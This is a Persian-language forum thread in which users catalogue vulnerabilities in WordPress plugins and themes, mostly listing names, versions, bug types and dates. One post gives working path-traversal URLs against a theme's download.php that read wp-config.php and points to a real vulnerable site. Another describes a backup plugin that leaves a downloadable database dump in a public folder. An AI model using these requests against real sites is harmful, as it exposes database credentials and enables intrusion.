Black_Sky 6349 ارسال شده در آذر 92 مالک گزارش بازنشر ارسال شده در آذر 92 نام افزونه : formcraftتاریخ:2013/12/2نسخه:Allنویسنده: Milad Hacking 12 لینک به ارسال
آریارامن 252 ارسال شده در دی 92 گزارش بازنشر ارسال شده در دی 92 (ویرایش شده) رعایت نکردن نکته امنیتی wp easy backupامشب خواستم این افزونه رو تست بزنم روی لوکال تستش کردم.همانطور که میدونید به طور پیشفرض مسیر wp-content/uploads قابل مشاهده است.سازنده این افزونه باید یک فایل index.html برای جلوگیری از مشاهده اون ایجاد میکرداین افزونه یک فایل در این مسیر ایجاد میکنه به اسم dump.sql که تمام اطلاعات سایت شما در دست هکر قرار میگیره.راستی یادم رفت تاکید کنم این فایل به راحتی قابل دانلوده ویرایش شده دی 92 توسط مرداویج 11 لینک به ارسال
Black_Sky 6349 ارسال شده در دی 92 مالک گزارش بازنشر ارسال شده در دی 92 ام افزونه : Wordpress Download Manager Free & Proتاریخ:12-06-2013لینک مخزن: http://downloads.wordpress.org/plugin/download-manager.zipنویسنده: IT Nerdboxباگ : XSS-------------------------------------پوسته : persuasionآدرس شرکت سازنده :http://mysitemyway.com/theme/persuasion-wordpress-theme/نسخه : 2.0 تا 2.3نویسنده:Interference Securityتاریخ : 19 December 2013 6 لینک به ارسال
Black_Sky 6349 ارسال شده در دی 92 مالک گزارش بازنشر ارسال شده در دی 92 اینها یادم نبودهاسم : WP-Cron Dashboard Wordpress pluginنویسنده: OKAMOTO Wataru نوع باگ: xssتاریخ: December 5, 2013نسخه:1.1.5-----------------------------------------------------اسم : Ad-minister Wordpress pluginنویسنده: henrikmelin, kalstromنوع باگ: xssتاریخ: December 5, 2013نسخه:0.6========================اسم : Wordpress EEMP pluginنویسنده:Cloudxنوع باگ: SQL Injectionنسخه:All versions effected========================== 8 لینک به ارسال
Black_Sky 6349 ارسال شده در بهمن 92 مالک گزارش بازنشر ارسال شده در بهمن 92 نام افزونه :wp-e-commerceنسخه: 3.8.9.5نویسنده:KedAns-Dzنوع :File Upload , Code Exec , File Include , Cross-Site Scripting , Object Inject 5 لینک به ارسال
Black_Sky 6349 ارسال شده در بهمن 92 مالک گزارش بازنشر ارسال شده در بهمن 92 نرم افزار آسیب پذیر: افزونه All in One SEO Pack وردپرسنوع آسیب پذیری: XSSنسخه آسیب پذیر: 1.3.6.4 - 1.6.15.2تاریخ انتشار: 02-10-2013راه حل: به روزرسانی به نسخه 2.0.3.1 5 لینک به ارسال
Black_Sky 6349 ارسال شده در بهمن 92 مالک گزارش بازنشر ارسال شده در بهمن 92 اسم:Wordpress Dandelion Themesتاریخ:31/01/2014نویسنده:TheBlackMonsterآدرس دانلود:http://themeforest.net/item/dandelion-powerful-elegant-wordpress-theme/136628 6 لینک به ارسال
Black_Sky 6349 ارسال شده در اسفند 92 مالک گزارش بازنشر ارسال شده در اسفند 92 این بخش مدتی بود نرسیده بودم:افزونه معروف امنیتی نام:WordPress Better WP Securityنسخه: 3.6.3تاریخ:2014-02-15--------------------------------------نام:WordPress Buddypressنسخه:1.9.1تاریخ:2014-02-15------------------------------------نام:WordPress Acunetix WP Security Make Backupتاریخ:2014-02-15نسخه:4.0.3 8 لینک به ارسال
Black_Sky 6349 ارسال شده در اسفند 92 مالک گزارش بازنشر ارسال شده در اسفند 92 نام: EasyMedia Galleryنسخه:1.2.29نوع باگ:XSS---نام:hanks You Counter Buttonنسخه:1.8.7نوع باگ:XSS---نام:Media File Renamerنسخه:1.70نوع باگ:XSS 8 لینک به ارسال
Black_Sky 6349 ارسال شده در اسفند 92 مالک گزارش بازنشر ارسال شده در اسفند 92 نام:Wordpress VideoWhisperنسخه:4.27.3نویسنده:High-Tech Bridgeتاریخ:2014-03-01 4 لینک به ارسال
عبدالماجد 3203 ارسال شده در اسفند 92 گزارش بازنشر ارسال شده در اسفند 92 ممنون از دوست خوبمون.نام : AdRotateنسخه : 3.9.4تاریخ انتشار : January 30, 2014نوع باگ : SQL Injectionحالت : پچ شده. 5 لینک به ارسال
Black_Sky 6349 ارسال شده در اسفند 92 مالک گزارش بازنشر ارسال شده در اسفند 92 نام:VideoWhisperنسخه:4.27.3تاریخ:February 7, 2014 5 لینک به ارسال
Black_Sky 6349 ارسال شده در اسفند 92 مالک گزارش بازنشر ارسال شده در اسفند 92 اسم:WordPress LayerSliderنسخه:4.6.1نوع باگ:CSRFتاریخ:2014-03-11 3 لینک به ارسال
Black_Sky 6349 ارسال شده در فروردین 93 مالک گزارش بازنشر ارسال شده در فروردین 93 نام:WordPress XClonerنسخه:3.1.0نوع حفره: Cross Site Request Forgeryتاریخ:2014-2340 3 لینک به ارسال
Black_Sky 6349 ارسال شده در خرداد 93 مالک گزارش بازنشر ارسال شده در خرداد 93 اینم زحمت یکی از دوستاننام:Wordpress Plugin Popup Imagesتاریخ:2014-06-1نوع باگ:Cross Site Scriptingنویسنده:Milad Hackingنام:Wordpress Bonuspressx Pluginتاریخ:2014-04-23نوع باگ:Cross Site Scriptingنویسنده:Milad Hacking 3 لینک به ارسال
Black_Sky 6349 ارسال شده در تیر 93 مالک گزارش بازنشر ارسال شده در تیر 93 شرمنده اما این حتما بخونید :نام :Wordpress 3.9.1نویسنده:Avinash Kumar Thapaآدرس: localhost/wordpress/ 5 لینک به ارسال
Black_Sky 6349 ارسال شده در تیر 93 مالک گزارش بازنشر ارسال شده در تیر 93 نام:ordpress gallery pluginنویسنده:@u0xتاریخ:June 24, 2014===============نام:WordPress image-symlinks Plugin Arbitrary File Upload Vulnerabilityنویسندهbrunoxتاریخ:2014-06-24 3 لینک به ارسال
Black_Sky 6349 ارسال شده در تیر 93 مالک گزارش بازنشر ارسال شده در تیر 93 نام افزونه و لینک منبع : BSK PDF Managerنویسنده :Claudio Vivianiتاریخ:2014-07-11نوع باگ :SQL Injectionپچ نشده است 5 لینک به ارسال
Black_Sky 6349 ارسال شده در مرداد 93 مالک گزارش بازنشر ارسال شده در مرداد 93 2014-07-29 WordPress Slider Revolution Responsive 4.1.4 File Download Published 2014-07-29 WordPress FBGorilla SQL Injection Published 2014-07-29 WordPress Lead Octopus Power SQL Injection Published 2014-07-25 Wordpress Video Gallery Plugin 2.5 - Multiple Vulnerabilities Published 2014-07-25 WordPress Video Gallery 2.5 Cross Site Scripting / SQL Injection Published 2014-07-22 WordPress Gallery Objects 0.4 SQL Injection Published 2014-07-16 Wordpress WPTouch Authenticated File Upload Published 2014-07-15 WordPress Tidio Gallery 1.1 Shell Upload / XSS Published 2014-07-15 WordPress CopySafe PDF Protection 0.6 Shell Upload Published 2014-07-14 DZS Video Gallery for WordPress XSS, FPD and RCE vulnerabilities Published 2014-07-13 WordPress Download Manager 2.6.8 Shell Upload Published 2014-07-10 WordPress BSK PDF Manager 1.3.2 SQL Injection Published 2014-07-07 Wordpress MailPoet (wysija-newsletters) Unauthenticated File Upload Published 2014-07-07 WordPress NextGEN Gallery 2.0.63 Shell Upload Published 2014-07-02 Wordpress blogstand-smart-banner.1.0 Cross Site Scripting Published 2014-06-29 Wordpress wp-construction-mode.1.8 Cross Site Scripting Published 2014-06-29 Wordpress ml-slider 2.5 Cross Site Scripting Published 2014-06-28 Wordpress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities Published 4 لینک به ارسال
Black_Sky 6349 ارسال شده در مرداد 93 مالک گزارش بازنشر ارسال شده در مرداد 93 2014-08-05 WordPress MyBand Theme Cross Site Scripting Published 2014-08-04 WordPress Gmedia Gallery 1.2.1 Shell Upload Published 2014-08-04 WordPress Gamespeed Theme Cross Site Scripting Published 2014-08-03 Wordpress SI CAPTCHA Anti-Spam Plugin Cross site scripting Published 2014-08-02 Wordpress Spider Video Player plugin Cross site scripting Published 1 لینک به ارسال
Black_Sky 6349 ارسال شده در مرداد 93 مالک گزارش بازنشر ارسال شده در مرداد 93 2014-08-08 WordPress WPSS 0.62 Cross Site Scripting Published 2014-08-08 WordPress 3.9.2 /xmlrpc.php poc Published 2014-08-08 WordPress WPSS 0.62 SQL Injection Publishe 1 لینک به ارسال
bestdata 830 ارسال شده در آبان 93 گزارش بازنشر ارسال شده در آبان 93 (ویرایش شده) نوع آسیب پذیری : Exploitمحل آسیب پذیری : تم و پلاگین های خاصی بطور مثال تم ypo-themeتاریخ انتشار این آسیب پذیری: 25-09-2014دستورات مورد استفاده:http://[site]/wp-content/themes/ypo-theme/download.php?download=../../../../wp-config.phphttp://[site]/wp-content/themes/ypo-theme/download.php?filename=../../../../wp-config.phphttp://[site]/wp-content/themes/ypo-theme/download.php?file=../../../../wp-config.phpنمونه سایت آسیب پذیر:http://www.ifso.com/..../wp-config.phpلطفا به سایت نمونه آسیب نرسانیدمنبعش هم به سایت خودم حمله شد متوجه این همه شدم ... ویرایش شده آبان 93 توسط bestdata 1 لینک به ارسال
Black_Sky 6349 ارسال شده در بهمن 93 مالک گزارش بازنشر ارسال شده در بهمن 93 انشالله تاپیک بیشتر بهش میرسم :WordPress Pixarbay Images Plugin 2.3 - Multiple VulnerabilitiesecommerceMajor - SQL Injection And Authentication bypass 1 لینک به ارسال
پست های پیشنهاد شده